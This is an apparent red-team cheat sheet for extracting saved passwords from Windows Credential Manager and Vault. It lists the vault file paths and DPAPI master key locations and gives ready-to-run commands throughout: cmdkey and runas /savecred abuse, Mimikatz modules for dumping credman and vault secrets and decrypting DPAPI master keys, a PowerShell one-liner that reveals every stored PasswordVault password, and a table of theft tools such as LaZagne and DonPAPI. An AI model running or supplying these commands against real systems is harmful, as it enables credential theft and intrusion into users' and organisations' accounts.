| Path | Scope |
%UserProfile%\AppData\Local\Microsoft\Vault\ | User |
%UserProfile%\AppData\Local\Microsoft\Credentials\ | User |
%UserProfile%\AppData\Roaming\Microsoft\Vault\ | User |
%ProgramData%\Microsoft\Vault\ | System |
%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\ | System |
| Type | Description |
| Web Credentials | Websites/online accounts (IE, legacy Edge) |
| Windows Credentials | Domain users, services, network resources |
cmdkey /list
| Field | Description |
| Target | Resource/account name |
| Type | Generic or Domain Password |
| User | Associated account |
| Persistence | Local machine persistence = survives reboots |
runas /savecred /user:DOMAIN\username cmd
rundll32 keymgr.dll,KRShowKeyMgr
privilege::debug
sekurlsa::credman
vault::list
vault::cred
sekurlsa::dpapi
dpapi::masterkey /in:<masterkey_file> /rpc
dpapi::cred /in:<credential_file>
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword(); $_ }
cmdkey /list
| Tool | Purpose |
| Mimikatz | Credential extraction from memory/DPAPI |
| SharpDPAPI | C# DPAPI attacks |
| LaZagne | Multi-platform credential recovery |
| DonPAPI | Remote DPAPI extraction |
| File | Purpose |
Policy.vpol | Contains AES keys (protected by DPAPI) |
*.vcrd | Vault credential files |
| Master key files | Located in %AppData%\Microsoft\Protect\<SID>\ |